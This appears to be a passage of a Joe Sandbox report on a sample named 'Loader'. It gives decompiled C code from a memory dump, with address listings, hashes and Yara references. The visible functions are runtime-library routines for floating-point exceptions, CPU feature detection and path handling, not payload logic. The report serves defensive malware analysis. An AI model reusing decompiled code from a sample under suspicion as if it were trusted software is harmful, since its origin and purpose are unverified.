										} while (_t195 <  *_t246);
									}
									 *_t246 = _t256;
									__eflags = _t256;
									if(_t256 != 0) {
										while(1) {
											__eflags = _t246[_t256];
											if(_t246[_t256] != 0) {
												goto L73;
											}
											_t256 = _t256 + 0xffffffff;
											__eflags = _t256;
											 *_t246 = _t256;
											if(_t256 != 0) {
												continue;
											}
											goto L73;
										}
									}
									L73:
									return _v32;
								}
							}
						} else {
							_t7 = _t289 + 4; // 0xfffff89c
							_t304 =  *_t7;
							_v12 = _t304;
							if(_t304 != 1) {
								__eflags = _t253;
								if(_t253 != 0) {
									_t323 = 0;
									_v16 = 0;
									_v40 = 0;
									_v28 = 0;
									__eflags = _t253 - 0xffffffff;
									if(_t253 != 0xffffffff) {
										_t281 = _t253 + 1;
										__eflags = _t281;
										_t282 =  &(_t244[_t281]);
										_v32 = _t282;
										do {
											_t236 = E00B03A50( *_t282, _t323, _t304, 0);
											_v28 = _t244;
											_t244 = _t244;
											_v68 = _t304;
											_t323 = _t282;
											_v16 = 0 + _t236;
											_t304 = _v12;
											asm("adc ecx, 0x0");
											_v40 = _v16;
											_t282 = _v32 - 4;
											_v32 = _t282;
											_t325 = _t325 - 1;
											__eflags = _t325;
										} while (_t325 != 0);
										_t244 = _a4;
									}
									_v544 = 0;
									_t342 =  &(_t244[1]);
									 *_t244 = 0;
									E00AEFD75(_t342, 0x1cc,  &_v540, 0);
									_t232 = _v28;
									__eflags = 0 - _t232;
									 *_t342 = _t323;
									_t244[2] = _t232;
									asm("sbb ecx, ecx");
									__eflags =  ~0x00000000;
									 *_t244 = 0xbadbae;
									return _v16;
								} else {
									_t324 =  &(_t244[1]);
									_v544 = _t253;
									 *_t244 = _t253;
									E00AEFD75(_t324, 0x1cc,  &_v540, _t253);
									_t239 = _t244[1];
									_t309 = _t239 % _v12;
									__eflags = 0 - _t309;
									 *_t324 = _t309;
									asm("sbb ecx, ecx");
									__eflags = 0;
									 *_t244 =  ~0x00000000;
									return _t239 / _v12;
								}
							} else {
								_v544 = _t312;
								 *_t244 = _t312;
								E00AEFD75( &(_t244[1]), 0x1cc,  &_v540, _t312);
								return _t244[1];
							}
						}
					}
				}
			}

0x00af06cc
0x00af06d1
0x00af06d5
0x00af0b4f
0x00af0b51
0x00af0b57
0x00af06db
0x00af06db
0x00af06de
0x00af06e0
0x00af06e5
0x00000000
0x00af06eb
0x00af06eb
0x00af06ee
0x00af06ee
0x00af06f1
0x00af06f6
0x00af0827
0x00af0829
0x00000000
0x00af082f
0x00af0831
0x00af0833
0x00af0835
0x00af0837
0x00af085b
0x00af085b
0x00af085b
0x00af0839
0x00af0840
0x00af0843
0x00af0843
0x00af0846
0x00af0848
0x00af084a
0x00000000
0x00000000
0x00af084c
0x00af084d
0x00af0850
0x00af0853
0x00af0855
0x00000000
0x00af0857
0x00000000
0x00af0857
0x00000000
0x00af0855
0x00af0859
0x00000000
0x00000000
0x00af0859
0x00af085c
0x00af085c
0x00af085e
0x00000000
0x00af0864
0x00af0864
0x00af0867
0x00af086a
0x00af086d
0x00af086d
0x00af0871
0x00af0874
0x00af0877
0x00af087a
0x00af0885
0x00af087c
0x00af0881
0x00af0881
0x00af088f
0x00af0894
0x00af0897
0x00af0899
0x00af08a2
0x00af08a4
0x00af08ab
0x00af08ae
0x00af08b1
0x00af08b9
0x00af08bf
0x00af08bf
0x00af08bf
0x00af08bf
0x00af08b1
0x00af08c2
0x00af08c4
0x00af08cb
0x00af08cb
0x00af08ce
0x00af08d1
0x00af08d7
0x00af08da
0x00af08dd
0x00af08e6
0x00af08ec
0x00af08ef
0x00af08f2
0x00af08f2
0x00af08f5
0x00af08fc
0x00af08fc
0x00af08f7
0x00af08f7
0x00af08f7
0x00af08fe
0x00af0901
0x00af0903
0x00af0906
0x00af090d
0x00af0910
0x00af0913
0x00af0915
0x00af0920
0x00af0923
0x00af0928
0x00af092d
0x00af0934
0x00af0939
0x00af093b
0x00af093d
0x00af0941
0x00af0944
0x00af0947
0x00af094f
0x00af0958
0x00af0958
0x00af095a
0x00af095d
0x00af095d
0x00af0947
0x00af0960
0x00af0968
0x00af096d
0x00af0972
0x00af0974
0x00af0976
0x00af0978
0x00af097b
0x00af097e
0x00af0980
0x00af0983
0x00af0986
0x00af0989
0x00af098b
0x00af0992
0x00af0997
0x00af099a
0x00af09a4
0x00af09a6
0x00af09a8
0x00af09ab
0x00af09ab
0x00af09ad
0x00af09b0
0x00af09b3
0x00af09b6
0x00af09b9
0x00af098d
0x00af098d
0x00af0990
0x00000000
0x00000000
0x00af0990
0x00af09bc
0x00af09be
0x00af09c0
0x00000000
0x00af09c2
0x00af09c2
0x00af09c5
0x00af09c7
0x00af09c7
0x00af09d5
0x00af09d8
0x00af09dd
0x00af09df
0x00000000
0x00000000
0x00af09e1
0x00af09e8
0x00af09e8
0x00af09eb
0x00af09ee
0x00af09f1
0x00af09f4
0x00af09f4
0x00af09f7
0x00af09fa
0x00af09fe
0x00af0a01
0x00af0a03
0x00af0a06
0x00000000
0x00000000
0x00af0a08
0x00af0a06
0x00af09e3
0x00af09e3
0x00af09e6
0x00000000
0x00000000
0x00000000
0x00000000
0x00af09e6
0x00af0a0d
0x00af0a0d
0x00000000
0x00af0a0d
0x00af0a0a
0x00000000
0x00af0a0a
0x00af09c5
0x00af09c0
0x00af0a10
0x00af0a10
0x00af0a12
0x00af0a1c
0x00af0a1c
0x00af0a1f
0x00af0a21
0x00af0a23
0x00af0a25
0x00af0a2a
0x00af0a2d
0x00af0a2d
0x00af0a30
0x00af0a33
0x00af0a36
0x00af0a38
0x00af0a4d
0x00af0a4f
0x00af0a51
0x00af0a53
0x00af0a55
0x00af0a57
0x00af0a59
0x00af0a5b
0x00af0a5e
0x00af0a5e
0x00af0a62
0x00af0a64
0x00af0a6a
0x00af0a6d
0x00af0a6d
0x00af0a6d
0x00af0a71
0x00af0a71
0x00af0a76
0x00af0a79
0x00af0a79
0x00af0a7e
0x00af0a80
0x00af0a82
0x00af0a89
0x00af0a89
0x00af0a8b
0x00af0a90
0x00af0a92
0x00af0a95
0x00af0a95
0x00af0a98
0x00af0aa0
0x00af0aa0
0x00af0aa2
0x00af0aa2
0x00af0aa7
0x00af0aad
0x00af0ab1
0x00af0ab4
0x00af0ab7
0x00af0ab9
0x00af0ab9
0x00af0ab9
0x00af0abe
0x00af0abe
0x00af0ac1
0x00af0ac4
0x00af0a84
0x00af0a84
0x00af0a87
0x00000000
0x00000000
0x00af0a87
0x00af0a82
0x00af0acb
0x00af0acb
0x00af0acc
0x00af0a14
0x00af0a14
0x00af0a16
0x00000000
0x00000000
0x00af0a16
0x00af0acf
0x00af0adc
0x00af0adf
0x00af0ae2
0x00af0ae6
0x00af0ae7
0x00af0aea
0x00af0aed
0x00af0af3
0x00af0af4
0x00af0af7
0x00af0afa
0x00af0afd
0x00af0afd
0x00af08f2
0x00af0b08
0x00af0b0b
0x00af0b0c
0x00af0b0e
0x00af0b10
0x00af0b15
0x00af0b20
0x00af0b20
0x00af0b26
0x00af0b29
0x00af0b2a
0x00af0b2a
0x00af0b20
0x00af0b2e
0x00af0b30
0x00af0b32
0x00af0b34
0x00af0b34
0x00af0b38
0x00000000
0x00000000
0x00af0b3a
0x00af0b3a
0x00af0b3d
0x00af0b3f
0x00000000
0x00000000
0x00000000
0x00af0b3f
0x00af0b34
0x00af0b41
0x00af0b4c
0x00af0b4c
0x00af085e
0x00af06fc
0x00af06fc
0x00af06fc
0x00af06ff
0x00af0705
0x00af0736
0x00af0738
0x00af077a
0x00af077c
0x00af0783
0x00af078a
0x00af078d
0x00af0790
0x00af0792
0x00af0792
0x00af0793
0x00af0796
0x00af07a0
0x00af07aa
0x00af07af
0x00af07b2
0x00af07b4
0x00af07b7
0x00af07c0
0x00af07c3
0x00af07c6
0x00af07c9
0x00af07cf
0x00af07d2
0x00af07d5
0x00af07d5
0x00af07d5
0x00af07da
0x00af07da
0x00af07e5
0x00af07f0
0x00af07f3
0x00af07ff
0x00af0804
0x00af080f
0x00af0811
0x00af0813
0x00af0819
0x00af081e
0x00af0820
0x00af0826
0x00af073a
0x00af0745
0x00af0748
0x00af0754
0x00af0756
0x00af075d
0x00af075f
0x00af0767
0x00af0769
0x00af076b
0x00af0770
0x00af0773
0x00af0779
0x00af0779
0x00af0707
0x00af0715
0x00af0721
0x00af0723
0x00af0735
0x00af0735
0x00af0705
0x00af06f6
0x00af06e5

Memory Dump Source

Source File: 00000000.00000002.283555540.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.283512556.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285047388.0000000000B05000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285850162.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285864405.0000000000B15000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.287188841.0000000000B39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_Loader.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1092e6019f5d72651b5277bdddd2d04a9f9ab62104a009dd5110edd46915678
Instruction ID: 5ce9584582c5fc44ebdedeca3615370b965b6c01522e14ca1a317017debbd1ee
Opcode Fuzzy Hash: a1092e6019f5d72651b5277bdddd2d04a9f9ab62104a009dd5110edd46915678
Instruction Fuzzy Hash: 28F13F71E012199FDF14DFA9C980AAEFBB1FF48314F158269E919A7345D731AE01CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00AF4E49 Relevance: 1.8, APIs: 1, Instructions: 274
COMMONLIBRARYCODECrypto

Download Yara Rule

C-Code - Quality: 100%

			E00AF4E49(long _a4, signed int* _a8, signed char _a12, signed int _a16, intOrPtr* _a20, unsigned int* _a24, intOrPtr _a28) {
				signed int _t172;
				signed int _t175;
				signed int _t178;
				signed int* _t179;
				signed char _t193;
				signed int _t196;
				signed int _t200;
				signed int _t203;
				void* _t204;
				void* _t207;
				signed int _t210;
				void* _t211;
				signed int _t226;
				unsigned int* _t241;
				signed char _t243;
				signed int* _t251;
				unsigned int* _t257;
				signed int* _t258;
				signed char _t260;
				long _t263;
				signed int* _t266;

				 *(_a4 + 4) = 0;
				_t263 = 0xc000000d;
				 *(_a4 + 8) = 0;
				 *(_a4 + 0xc) = 0;
				_t243 = _a12;
				if((_t243 & 0x00000010) != 0) {
					_t263 = 0xc000008f;
					 *(_a4 + 4) =  *(_a4 + 4) | 1;
				}
				if((_t243 & 0x00000002) != 0) {
					_t263 = 0xc0000093;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000002;
				}
				if((_t243 & 0x00000001) != 0) {
					_t263 = 0xc0000091;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000004;
				}
				if((_t243 & 0x00000004) != 0) {
					_t263 = 0xc000008e;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
				}
				if((_t243 & 0x00000008) != 0) {
					_t263 = 0xc0000090;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000010;
				}
				_t266 = _a8;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 << 4) ^  *(_a4 + 8)) & 0x00000010;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 +  *_t266) ^  *(_a4 + 8)) & 0x00000008;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 >> 1) ^  *(_a4 + 8)) & 0x00000004;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 >> 3) ^  *(_a4 + 8)) & 0x00000002;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 >> 5) ^  *(_a4 + 8)) & 1;
				_t260 = E00AF547F(_a4);
				if((_t260 & 0x00000001) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000010;
				}
				if((_t260 & 0x00000004) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000008;
				}
				if((_t260 & 0x00000008) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000004;
				}
				if((_t260 & 0x00000010) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000002;
				}
				if((_t260 & 0x00000020) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 1;
				}
				_t172 =  *_t266 & 0x00000c00;
				if(_t172 == 0) {
					 *_a4 =  *_a4 & 0xfffffffc;
				} else {
					if(_t172 == 0x400) {
						_t258 = _a4;
						_t226 =  *_t258 & 0xfffffffd | 1;
						L26:
						 *_t258 = _t226;
						L29:
						_t175 =  *_t266 & 0x00000300;
						if(_t175 == 0) {
							_t251 = _a4;
							_t178 =  *_t251 & 0xffffffeb | 0x00000008;
							L35:
							 *_t251 = _t178;
							L36:
							_t179 = _a4;
							_t255 = (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
							 *_t179 =  *_t179 ^ (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
							 *(_a4 + 0x20) =  *(_a4 + 0x20) | 1;
							if(_a28 == 0) {
								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe3 | 0x00000002;
								 *((long long*)(_a4 + 0x10)) =  *_a20;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
								_t255 = _a4;
								_t241 = _a24;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe3 | 0x00000002;
								 *(_a4 + 0x50) =  *_t241;
							} else {
								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe1;
								 *((intOrPtr*)(_a4 + 0x10)) =  *_a20;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
								_t241 = _a24;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe1;
								 *(_a4 + 0x50) =  *_t241;
							}
							E00AF53EB(_t255);
							RaiseException(_t263, 0, 1,  &_a4);
							_t257 = _a4;
							_t193 = _t257[2];
							if((_t193 & 0x00000010) != 0) {
								 *_t266 =  *_t266 & 0xfffffffe;
								_t193 = _t257[2];
							}
							if((_t193 & 0x00000008) != 0) {
								 *_t266 =  *_t266 & 0xfffffffb;
								_t193 = _t257[2];
							}
							if((_t193 & 0x00000004) != 0) {
								 *_t266 =  *_t266 & 0xfffffff7;
								_t193 = _t257[2];
							}
							if((_t193 & 0x00000002) != 0) {
								 *_t266 =  *_t266 & 0xffffffef;
								_t193 = _t257[2];
							}
							if((_t193 & 0x00000001) != 0) {
								 *_t266 =  *_t266 & 0xffffffdf;
							}
							_t196 =  *_t257 & 0x00000003;
							if(_t196 == 0) {
								 *_t266 =  *_t266 & 0xfffff3ff;
							} else {
								_t207 = _t196 - 1;
								if(_t207 == 0) {
									_t210 =  *_t266 & 0xfffff7ff | 0x00000400;
									L55:
									 *_t266 = _t210;
									L58:
									_t200 =  *_t257 >> 0x00000002 & 0x00000007;
									if(_t200 == 0) {
										_t203 =  *_t266 & 0xfffff3ff | 0x00000300;
										L64:
										 *_t266 = _t203;
										L65:
										if(_a28 == 0) {
											 *_t241 = _t257[0x14];
										} else {
											 *_t241 = _t257[0x14];
										}
										return _t203;
									}
									_t204 = _t200 - 1;
									if(_t204 == 0) {
										_t203 =  *_t266 & 0xfffff3ff | 0x00000200;
										goto L64;
									}
									_t203 = _t204 - 1;
									if(_t203 == 0) {
										 *_t266 =  *_t266 & 0xfffff3ff;
									}
									goto L65;
								}
								_t211 = _t207 - 1;
								if(_t211 == 0) {
									_t210 =  *_t266 & 0xfffffbff | 0x00000800;
									goto L55;
								}
								if(_t211 == 1) {
									 *_t266 =  *_t266 | 0x00000c00;
								}
							}
							goto L58;
						}
						if(_t175 == 0x200) {
							_t251 = _a4;
							_t178 =  *_t251 & 0xffffffe7 | 0x00000004;
							goto L35;
						}
						if(_t175 == 0x300) {
							 *_a4 =  *_a4 & 0xffffffe3;
						}
						goto L36;
					}
					if(_t172 == 0x800) {
						_t258 = _a4;
						_t226 =  *_t258 & 0xfffffffe | 0x00000002;
						goto L26;
					}
					if(_t172 == 0xc00) {
						 *_a4 =  *_a4 | 0x00000003;
					}
				}
			}

0x00af4e57
0x00af4e5e
0x00af4e63
0x00af4e69
0x00af4e6c
0x00af4e72
0x00af4e77
0x00af4e7c
0x00af4e7c
0x00af4e82
0x00af4e87
0x00af4e8c
0x00af4e8c
0x00af4e93
0x00af4e98
0x00af4e9d
0x00af4e9d
0x00af4ea4
0x00af4ea9
0x00af4eae
0x00af4eae
0x00af4eb5
0x00af4eba
0x00af4ebf
0x00af4ebf
0x00af4ec7
0x00af4ed7
0x00af4ee9
0x00af4efb
0x00af4f0e
0x00af4f20
0x00af4f28
0x00af4f2d
0x00af4f32
0x00af4f32
0x00af4f39
0x00af4f3e
0x00af4f3e
0x00af4f45
0x00af4f4a
0x00af4f4a
0x00af4f51
0x00af4f56
0x00af4f56
0x00af4f5d
0x00af4f62
0x00af4f62
0x00af4f6c
0x00af4f6e
0x00af4fa8
0x00af4f70
0x00af4f75
0x00af4f99
0x00af4fa1
0x00af4f95
0x00af4f95
0x00af4fab
0x00af4fb2
0x00af4fb4
0x00af4fd6
0x00af4fde
0x00af4fe1
0x00af4fe1
0x00af4fe3
0x00af4fe3
0x00af4fee
0x00af4ff4
0x00af4ff9
0x00af5000
0x00af503a
0x00af5045
0x00af504b
0x00af504e
0x00af5051
0x00af505d
0x00af5065
0x00af5002
0x00af5005
0x00af5011
0x00af5017
0x00af501d
0x00af5020
0x00af5029
0x00af5029
0x00af5068
0x00af5076
0x00af507c
0x00af507f
0x00af5084
0x00af5086
0x00af5089
0x00af5089
0x00af508e
0x00af5090
0x00af5093
0x00af5093
0x00af5098
0x00af509a
0x00af509d
0x00af509d
0x00af50a2
0x00af50a4
0x00af50a7
0x00af50a7
0x00af50ac
0x00af50ae
0x00af50ae
0x00af50bb
0x00af50be
0x00af50f5
0x00af50c0
0x00af50c0
0x00af50c3
0x00af50ee
0x00af50e3
0x00af50e3
0x00af50f7
0x00af50ff
0x00af5102
0x00af5121
0x00af5126
0x00af5126
0x00af5128
0x00af512d
0x00af5139
0x00af512f
0x00af5132
0x00af5132
0x00af513e
0x00af513e
0x00af5104
0x00af5107
0x00af5116
0x00000000
0x00af5116
0x00af5109
0x00af510c
0x00af510e
0x00af510e
0x00000000
0x00af510c
0x00af50c5
0x00af50c8
0x00af50de
0x00000000
0x00af50de
0x00af50cd
0x00af50cf
0x00af50cf
0x00af50cd
0x00000000
0x00af50be
0x00af4fbb
0x00af4fc9
0x00af4fd1
0x00000000
0x00af4fd1
0x00af4fbf
0x00af4fc4
0x00af4fc4
0x00000000
0x00af4fbf
0x00af4f7c
0x00af4f8a
0x00af4f92
0x00000000
0x00af4f92
0x00af4f80
0x00af4f85
0x00af4f85
0x00af4f80

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00AF4E44,?,?,00000008,?,?,00B01FBF,00000000), ref: 00AF5076

Memory Dump Source

Source File: 00000000.00000002.283555540.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.283512556.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285047388.0000000000B05000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285850162.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285864405.0000000000B15000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.287188841.0000000000B39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_Loader.jbxd

Yara matches

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 1dde0bd1a6a4094033b038d3918b29be335a3a06a68d6a83a36e7079e801d83a
Instruction ID: 12b6a753bdaf72165812c90474334da0d085d66fc6898284d0b0d02e7d53f40d
Opcode Fuzzy Hash: 1dde0bd1a6a4094033b038d3918b29be335a3a06a68d6a83a36e7079e801d83a
Instruction Fuzzy Hash: BDB14A316106089FD714CF68C486BA57BF0FF49365F258658FA9ACF2A1C735E982CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00AE9A85 Relevance: 1.6, APIs: 1, Instructions: 144
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E00AE9A85(signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _t60;
				signed int _t61;
				signed int _t62;
				signed int _t63;
				signed int _t66;
				signed int _t67;
				signed int _t73;
				intOrPtr _t74;
				intOrPtr _t75;
				intOrPtr* _t77;
				signed int _t78;
				intOrPtr* _t82;
				signed int _t85;
				signed int _t90;
				intOrPtr* _t93;
				signed int _t96;
				signed int _t99;
				signed int _t104;

				_t90 = __edx;
				 *0xb37e6c =  *0xb37e6c & 0x00000000;
				 *0xb36bc0 =  *0xb36bc0 | 0x00000001;
				if(IsProcessorFeaturePresent(0xa) == 0) {
					L23:
					return 0;
				}
				_v20 = _v20 & 0x00000000;
				_push(_t74);
				_t93 =  &_v40;
				asm("cpuid");
				_t75 = _t74;
				 *_t93 = 0;
				 *((intOrPtr*)(_t93 + 4)) = _t74;
				 *((intOrPtr*)(_t93 + 8)) = 0;
				 *(_t93 + 0xc) = _t90;
				_v16 = _v40;
				_v12 = _v28 ^ 0x49656e69;
				_v8 = _v36 ^ 0x756e6547;
				_push(_t75);
				asm("cpuid");
				_t77 =  &_v40;
				 *_t77 = 1;
				 *((intOrPtr*)(_t77 + 4)) = _t75;
				 *((intOrPtr*)(_t77 + 8)) = 0;
				 *(_t77 + 0xc) = _t90;
				if((_v8 | _v32 ^ 0x6c65746e | _v12) != 0) {
					L9:
					_t96 =  *0xb37e70; // 0x2
					L10:
					_t85 = _v32;
					_t60 = 7;
					_v8 = _t85;
					if(_v16 < _t60) {
						_t78 = _v20;
					} else {
						_push(_t77);
						asm("cpuid");
						_t82 =  &_v40;
						 *_t82 = _t60;
						 *((intOrPtr*)(_t82 + 4)) = _t77;
						 *((intOrPtr*)(_t82 + 8)) = 0;
						_t85 = _v8;
						 *(_t82 + 0xc) = _t90;
						_t78 = _v36;
						if((_t78 & 0x00000200) != 0) {
							 *0xb37e70 = _t96 | 0x00000002;
						}
					}
					_t61 =  *0xb36bc0; // 0x6f
					_t62 = _t61 | 0x00000002;
					 *0xb37e6c = 1;
					 *0xb36bc0 = _t62;
					if((_t85 & 0x00100000) != 0) {
						_t63 = _t62 | 0x00000004;
						 *0xb37e6c = 2;
						 *0xb36bc0 = _t63;
						if((_t85 & 0x08000000) != 0 && (_t85 & 0x10000000) != 0) {
							asm("xgetbv");
							_v24 = _t63;
							_v20 = _t90;
							_t104 = 6;
							if((_v24 & _t104) == _t104) {
								_t66 =  *0xb36bc0; // 0x6f
								_t67 = _t66 | 0x00000008;
								 *0xb37e6c = 3;
								 *0xb36bc0 = _t67;
								if((_t78 & 0x00000020) != 0) {
									 *0xb37e6c = 5;
									 *0xb36bc0 = _t67 | 0x00000020;
									if((_t78 & 0xd0030000) == 0xd0030000 && (_v24 & 0x000000e0) == 0xe0) {
										 *0xb36bc0 =  *0xb36bc0 | 0x00000040;
										 *0xb37e6c = _t104;
									}
								}
							}
						}
					}
					goto L23;
				}
				_t73 = _v40 & 0x0fff3ff0;
				if(_t73 == 0x106c0 || _t73 == 0x20660 || _t73 == 0x20670 || _t73 == 0x30650 || _t73 == 0x30660 || _t73 == 0x30670) {
					_t99 =  *0xb37e70; // 0x2
					_t96 = _t99 | 0x00000001;
					 *0xb37e70 = _t96;
					goto L10;
				} else {
					goto L9;
				}
			}

0x00ae9a85
0x00ae9a88
0x00ae9a92
0x00ae9aa3
0x00ae9c52
0x00ae9c55
0x00ae9c55
0x00ae9aa9
0x00ae9aaf
0x00ae9ab4
0x00ae9ab8
0x00ae9abc
0x00ae9abd
0x00ae9abf
0x00ae9ac2
0x00ae9ac7
0x00ae9ad0
0x00ae9ae1
0x00ae9aec
0x00ae9af2
0x00ae9af3
0x00ae9af8
0x00ae9afb
0x00ae9b00
0x00ae9b08
0x00ae9b0b
0x00ae9b0e
0x00ae9b53
0x00ae9b53
0x00ae9b59
0x00ae9b59
0x00ae9b5e
0x00ae9b5f
0x00ae9b65
0x00ae9b96
0x00ae9b67
0x00ae9b69
0x00ae9b6a
0x00ae9b6f
0x00ae9b72
0x00ae9b74
0x00ae9b77
0x00ae9b7a
0x00ae9b7d
0x00ae9b80
0x00ae9b89
0x00ae9b8e
0x00ae9b8e
0x00ae9b89
0x00ae9b99
0x00ae9b9e
0x00ae9ba1
0x00ae9bab
0x00ae9bb6
0x00ae9bbc
0x00ae9bbf
0x00ae9bc9
0x00ae9bd4
0x00ae9be0
0x00ae9be3
0x00ae9be6
0x00ae9bf1
0x00ae9bf6
0x00ae9bf8
0x00ae9bfd
0x00ae9c00
0x00ae9c0a
0x00ae9c12
0x00ae9c17
0x00ae9c21
0x00ae9c2f
0x00ae9c42
0x00ae9c49
0x00ae9c49
0x00ae9c2f
0x00ae9c12
0x00ae9bf6
0x00ae9bd4
0x00000000
0x00ae9c51
0x00ae9b13
0x00ae9b1d
0x00ae9b42
0x00ae9b48
0x00ae9b4b
0x00000000
0x00000000
0x00000000
0x00000000

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00AE9A9B

Memory Dump Source

Source File: 00000000.00000002.283555540.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.283512556.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285047388.0000000000B05000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285850162.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285864405.0000000000B15000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.287188841.0000000000B39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_Loader.jbxd

Yara matches

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 6014e89d463e52479914ec50a55e1104ca5bd5e0d81c558b6c19cc8b477b4d6a
Instruction ID: 7194688de357ccdb736c8e9d9a556baf3fcb49213565daecaf470e469f60adb0
Opcode Fuzzy Hash: 6014e89d463e52479914ec50a55e1104ca5bd5e0d81c558b6c19cc8b477b4d6a
Instruction Fuzzy Hash: 4A516AB1A003599FEB28CF56E8817AEBBF5FB48310F24846AD405EB250EB759D40CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00AFBE04 Relevance: 1.6, APIs: 1, Instructions: 140
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E00AFBE04(void* __ecx, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr* _a16) {
				signed int _v8;
				signed int _v12;
				union _FINDEX_INFO_LEVELS _v28;
				intOrPtr* _v32;
				intOrPtr _v36;
				signed int _v48;
				struct _WIN32_FIND_DATAW _v604;
				char _v605;
				intOrPtr* _v612;
				union _FINDEX_INFO_LEVELS _v616;
				union _FINDEX_INFO_LEVELS _v620;
				union _FINDEX_INFO_LEVELS _v624;
				signed int _v628;
				union _FINDEX_INFO_LEVELS _v632;
				union _FINDEX_INFO_LEVELS _v636;
				signed int _v640;
				signed int _v644;
				union _FINDEX_INFO_LEVELS _v648;
				union _FINDEX_INFO_LEVELS _v652;
				union _FINDEX_INFO_LEVELS _v656;
				union _FINDEX_INFO_LEVELS _v660;
				signed int _v664;
				union _FINDEX_INFO_LEVELS _v668;
				union _FINDEX_INFO_LEVELS _v672;
				void* __ebx;
				void* __edi;
				intOrPtr _t68;
				signed int _t73;
				signed int _t75;
				char _t77;
				signed char _t78;
				signed int _t84;
				signed int _t94;
				signed int _t97;
				union _FINDEX_INFO_LEVELS _t98;
				union _FINDEX_INFO_LEVELS _t100;
				intOrPtr* _t106;
				signed int _t109;
				intOrPtr _t116;
				signed int _t118;
				signed int _t121;
				signed int _t123;
				void* _t126;
				union _FINDEX_INFO_LEVELS _t127;
				void* _t128;
				intOrPtr* _t130;
				intOrPtr* _t133;
				signed int _t135;
				intOrPtr* _t138;
				signed int _t143;
				signed int _t149;
				void* _t155;
				signed int _t158;
				intOrPtr _t160;
				void* _t161;
				void* _t165;
				void* _t166;
				signed int _t167;
				signed int _t170;
				void* _t171;
				signed int _t172;
				void* _t173;
				void* _t174;

				_push(__ecx);
				_t133 = _a4;
				_t2 = _t133 + 1; // 0x1
				_t155 = _t2;
				do {
					_t68 =  *_t133;
					_t133 = _t133 + 1;
				} while (_t68 != 0);
				_t158 = _a12;
				_t135 = _t133 - _t155 + 1;
				_v8 = _t135;
				if(_t135 <=  !_t158) {
					_push(__esi);
					_t5 = _t158 + 1; // 0x1
					_t126 = _t5 + _t135;
					_t165 = E00AF4A92(_t126, 1);
					__eflags = _t158;
					if(_t158 == 0) {
						L7:
						_push(_v8);
						_t126 = _t126 - _t158;
						_t73 = E00B016DE(_t165 + _t158, _t126, _a4);
						_t172 = _t171 + 0x10;
						__eflags = _t73;
						if(_t73 != 0) {
							goto L12;
						} else {
							_t130 = _a16;
							_t118 = E00AFC148(_t130);
							_v8 = _t118;
							__eflags = _t118;
							if(_t118 == 0) {
								 *( *(_t130 + 4)) = _t165;
